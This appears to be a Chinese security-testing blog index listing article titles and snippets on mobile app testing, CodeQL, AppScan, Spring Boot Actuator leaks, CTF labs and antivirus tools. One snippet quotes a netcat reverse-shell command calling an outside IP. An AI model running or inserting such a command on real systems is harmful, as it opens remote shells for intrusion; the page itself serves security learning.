mobsf,app安全测试
移动安全
手机模拟器安装证书抓包
如果要使用Fiddler抓包,就需要使用代理将流量带出模拟器,但是模拟器并非直接与主机在同一个内网,需要使用者自行查询模拟器的ip地址。手机模拟器上有时候不好安装根证书,只能使用adb直接将导出的证书复制到手机的/system/etc/security/cacerts目录下了。先准备好证书,放到手机
白盒代码审计工具——CodeQL安装与使用教程【Linux+Windows】
学习CodeQL代码审计工具的总结CodeQL的安装
Spring boot带来的信息泄露
一、什么是ActuatorSpring Boot Actuators 模块端点信息官方文档:Spring Boot Actuator Web API DocumentationSpring Boot Actuator 模块提供了健康检查,审计,指标收集,HTTP 跟踪等,是帮助我们监控和管理Spri
Appscan安全测试
Appscan主要是对web应用和移动端app做安全扫描,通过录制脚本、选择扫描规则、回放脚本,来发现系统存在的SQL注入、XSS、CSRF等安全漏洞,并能自动生成安全测试报告。
几款好用的自动化单元测试框架和工具
用自动化单元测试的方式,研发人员(通常建议单元测试由开发人员完成最为高效,但是开发人员通常项目任务紧,时间和精力不够)在用例设计、执行和数据管理上不需要再花费巨量的时间,就可能有足够的精力来真正进行和完成单元测试内容。
内网渗透-常用反弹shell方法总结
常用反弹shell方法总结文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹she
一款强大的红队信息收集和资产收集工具(Kscan)
一款强大的红队资产测绘工具(Kscan)
信息搜集方法总结
对常用的信息搜集方法做了一个简单的总结。
msf--Linux反弹shell--一看就会的实验
msf--Linux反弹shell--一看就会的实验
防病毒Clamav使用及API调用测试
1、Clamav介绍(1)clamav是什么? ClamAV 是一个C语言开发的开源 (GPLv2) 反病毒工具包,专为邮件网关上的电子邮件扫描而设计。它提供了许多实用程序,包括灵活且可扩展的多线程守护程序、命令行扫描程序和用于自动数据库更新的高级工具。该软件包的核心是一个以共享库形式提供的反病毒引
CFS三层内网靶场渗透
使用搭载了VMnet1网卡的kali模拟攻击者从外网信息收集,得到网站信息,利用网站漏洞夺取外网服务器权限,又将失陷的外网服务器作为跳板机,通过代理的方式访问到了内网服务器,然后通过内网服务器网站的漏洞,再一次夺取权限并建立二次代理以后,到达内网办公环境,最后利用主机所存在的漏洞,获得内网主机权限的
登陆界面改怎么测试,分析,测试用例
主要考察: 测试者是否熟悉各种测试方法,是否有丰富的 App/Web 测试经验,以及相关开发经验,以及设计 Test case 的能力。功能测试 (Function test)1)输入正确的用户名和密码,点击提交按钮,验证是否能正确登录2)输入错误的用户名或者密码, 验证登录会失败,是否有相应的错误
安全性测试方法
测试cookie是否进行了安全性方面的设置。例如secure=true,防止cookie在HTTP会话中以明文传输;httponly=true,防止JS脚本读取cookie信息,防止XSS攻击。使用新版本有助于防止基于已知漏洞的XSS工具。安全中的权限问题主要包括未授权访问和越权两大类。
burpsuite安装插件captcha-killer识别验证码
安装和初步使用captcha-killer插件进行验证码识别
CTF综合靶场渗透系列-Billu_b0x
CTF综合靶场渗透系列-Billu_b0x
Kali下安装 dvwa 的完整详细教程
Kali下安装 dvwa 的完整详细教程
AppScan 安全测试详解+实操
appscan详解、实操、未登录、登录、登录带验证码等等,解决方式~~
开发人员使用Klocwork进行软件安全的五大原因
KlocworkCheckerStudio是一个GUI应用程序,它使开发团队可以使用其优雅的KAST表达式语言轻松实现自己的自定义编码标准。这使开发人员能够调用他们自己的代码库所独有的危险做法。
Fault、Error及Failure的解释
Fault、Error和Failure的关系为:Fault(缺陷)可能导致Error(差错),Error(差错)可能导致Failure(失效)
